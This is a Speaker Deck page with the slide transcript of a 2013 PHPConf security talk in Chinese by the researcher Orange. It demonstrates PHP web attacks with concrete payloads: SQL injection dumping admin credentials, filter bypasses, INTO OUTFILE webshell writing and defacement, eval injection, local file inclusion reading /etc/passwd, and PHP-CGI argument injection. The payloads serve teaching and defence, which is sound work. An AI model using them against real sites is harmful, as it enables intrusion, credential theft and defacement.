$30 off During Our Annual Pro Sale. View Details »

PHPConf 2013 - 矛盾大對決

Orange
October 05, 2013
Technology
53
27k

PHPConf 2013 - 矛盾大對決

能入侵任何網站的駭客 vs. 絕對不會被入侵的網站

Orange

October 05, 2013
Tweet

More Decks by Orange

See All by Orange
Bug Bounty 獎金獵人甘苦談 - 那些年我回報過的漏洞
p8361
13
35k
那些 Web Hacking 中的奇技淫巧
p8361
16
14k
關於 HITCON CTF 的那些事 之 Web 狗如何在險惡的 CTF 世界中存活?
p8361
6
12k
0-Day 輕鬆談 - Happy Fuzzing Internet Explorer
p8361
14
12k
駭客看 Django
p8361
25
12k

Other Decks in Technology

See All in Technology
RealSense T265とD415とUFACTORY Lite 6で模倣学習の実験
hygradme
0
320
エンジニア不足の中で どう技術的負債と向き合ったのか RevComm Research の場合 -
revcomm_inc
4
3.2k
フロントエンドリアーキテクチャリングと開発チームのスキルトランスファーにおける9ヶ月間の奮闘記
wakamsha
5
3.9k
SmartHRのマルチプロダクト戦略実行の苦悩と挑戦
h1kita
4
2.6k
ChatGPT for Developer - 超入門
dahatake
40
22k
Kafka Streamsで作る10万rpsを支えるイベント駆動マイクロサービス
joker1007
7
2.3k
実装がすべてではない、開発者の周りから考える Web プロダクトセキュリティ
oldbigbuddha
1
210
SOLID Is Dead, Long Live SOLID
lemiorhan
2
190
開発生産性向上へのコミットについて理解してもらうためのスライドテンプレートを作った話
ouchi2501
0
170
ROSCon 2023参加報告:Real-Time Workshop & Zenoh's Current Status and Forecast
takasehideki
1
210
ミチビク株式会社エンジニアカンパニーデック
knsg16
0
2.1k
LLMを活用した爆速アウトプットのすゝめ / bakusoku-outputs-with-llm
yuya4
8
3.8k

Featured

See All Featured
Pencils Down: Stop Designing & Start Developing
hursman
115
11k
Testing 201, or: Great Expectations
jmmastey
26
6.1k
Building Applications with DynamoDB
mza
87
5.3k
The Psychology of Web Performance [Beyond Tellerrand 2023]
tammyeverts
0
1k
What the flash - Photography Introduction
edds
64
11k
How GitHub Uses GitHub to Build GitHub
holman
467
280k
Making Projects Easy
brettharned
105
5.2k
Documentation Writing (for coders)
carmenintech
55
3.4k
Refactoring Trust on Your Teams (GOTO; Chicago 2020)
rmw
24
2k
Large-scale JavaScript Application Architecture
addyosmani
501
110k
GraphQLの誤解/rethinking-graphql
sonatard
45
8.7k
Happy Clients
brianwarren
91
6.1k

Transcript

  1. 矛盾大對決!
    2013/10/05 @ PHPConf
    [email protected]

    View Slide

  2. 「能入侵任何網站的駭客」

    View Slide

  3. About Me
    •  蔡政達 aka Orange
    •  2009 台灣駭客年會競賽
    冠軍
    •  2011, 2012 全國資安競賽
    金盾獎冠軍
    •  2011 東京 AVTOKYO 講師
    •  2012 香港 VXRLConf 講師
    •  2013 台灣 HITCON 講師
    •  台灣 PHPConf, WebConf,
    PyConf 講師



    •  專精於
    –  駭客攻擊手法
    –  Web Security
    –  Windows Vulnerability
    Exploitation

    View Slide

  4. About Me
    •  CHROOT  Security  Group  Member  
    •  Work  at  DevCore  
    •  Blog  
    – h>p://blog.orange.tw/

    View Slide

  5. 我絕對能入侵你的網站!

    View Slide

  6. SQL INJECTION

    View Slide

  7. show.php?id=1'
    SELECT * FROM news WHERE id=1'

    View Slide

  8. View Slide

  9. 寫後門改首頁
    •  show.php?id=20 into outfile '/var/www/.a.php'
    lines terminated by ''
    •  http://you-shall-not-hack.me/.a.php
    – POST echo `ls -alh`
    – POST `echo Hack by Orange > index.php`

    View Slide

  10. View Slide

  11. 使用 UNION 污染 SQL 結果
    •  show.php?id=1
    – SELECT * FROM news WHERE id=1
    •  show.php?id=1 union select 1,2,3
    – SELECT * FROM news WHERE id=1 union select 1,2,3
    •  show.php?id=-1 union select 1,2,3
    – SELECT * FROM news WHERE id=-1 union select 1,2,3

    View Slide

  12. View Slide

  13. 使用 UNION 泄露敏感資訊
    show.php?id=-1 union select 1,user(),database()

    View Slide

  14. View Slide

  15. 使用 UNION 取得管理員帳號密碼
    show.php?id=-1 union select 1, username, password
    from admin where username like '%admin%'

    View Slide

  16. View Slide

  17. 繞過空白字元檢查過濾

    View Slide

  18. 繞過空白字元檢查過濾
    •  MySQL 解釋語法寬鬆特性
    – show.php?id=-1 union select 1,2,3
    – show.php?id=-1/**/union/**/select/**/1,2,3
    – show.php?id=-1%09union%0Dselect%A01,2,3
    – show.php?id=(-1)union(select(1),2,3)

    View Slide

  19. 繞過單引號過濾檢查

    View Slide

  20. 繞過單引號過濾檢查
    •  單引號被過濾怎麼辦?
    – 還是可以進行 SQL Injection
    – ( SELECT 'foo' ) 等價於 ( SELECT 0x666f6f )
    – show.php?id=-1 union select username,password,3 from
    admin where username like 0x2561646d25
    •  into outfile '/var/www/.a.php' 就不能這樣搞了
    – 不能寫檔怎麼辦?

    View Slide

  21. 跳出思考框框
    •  XSS 並不是只有跳個視窗或是偷 Cookie 而已
    •  利用 XSS 劫持 window.onload 修改首頁
    –  window.onload = function(){document.write(/<br/>Hacked by Orange/)}

    View Slide

  22. View Slide

  23. View Slide

  24. DOUBLE QUOTE EVALUATION

    View Slide

  25. Double Quote Evaluaion
    •  網站變數?
    – 存資料庫?
    – 但是如果是資料庫連線密碼怎麼辦?
    – 存檔案?
    – config.php ?

    View Slide

  26. View Slide

  27. Double Quote Evalutation
    •  $db_user = "root";
    •  $db_user = "root $foo";
    •  $db_user = "root ${@phpinfo()}";
    •  $db_user = "root ${@eval($_POST[cmd])}";

    View Slide

  28. View Slide

  29. View Slide

  30. Local File Inclusion

    View Slide

  31. Local File Inclusion

    $_mod = $_GET[module];
    include( 'modules/' . $_mod . '.php' ;)
    – index.php?module=login
    – index.php?module=logout
    – index.php?module=admin
    – index.php?module=add

    View Slide

  32. Local File Inclusion

    $_mod = $_GET[module];
    include( 'modules/' . $_mod . '.php' ;)
    – index.php?module=login
    – index.php?module=./login
    – index.php?module=./login.php%00
    – index.php?module=../../../etc/passwd%00

    View Slide

  33. View Slide

  34. Local File Inclusion
    •  include( 駭客可控檔案內容 ) = GG
    – 上傳圖片
    – /var/log/httpd/access.log
    – upload + $_FILES[file][tmp_name]
    – /proc/self/environ
    •  index.php?module=../../../../proc/self/environ
    – User-Agent:

    View Slide

  35. View Slide

  36. View Slide

  37. View Slide

  38. PHP-CGI Argument Injection

    View Slide

  39. PHP-CGI Argument Injection
    •  index.php?-s
    – php-cgi -s index.php

    View Slide

  40. View Slide

  41. PHP-CGI Argument Injection
    •  index.php?-d+allow_url_include%3dOn+-d
    +auto_prepend_file%3dphp://input
    – php-cgi -d allow_url_include=On
    -d auto_prepend_file=php://input

    View Slide

  42. View Slide

  43. View Slide

  44. Thanks :)
    [email protected]

    View Slide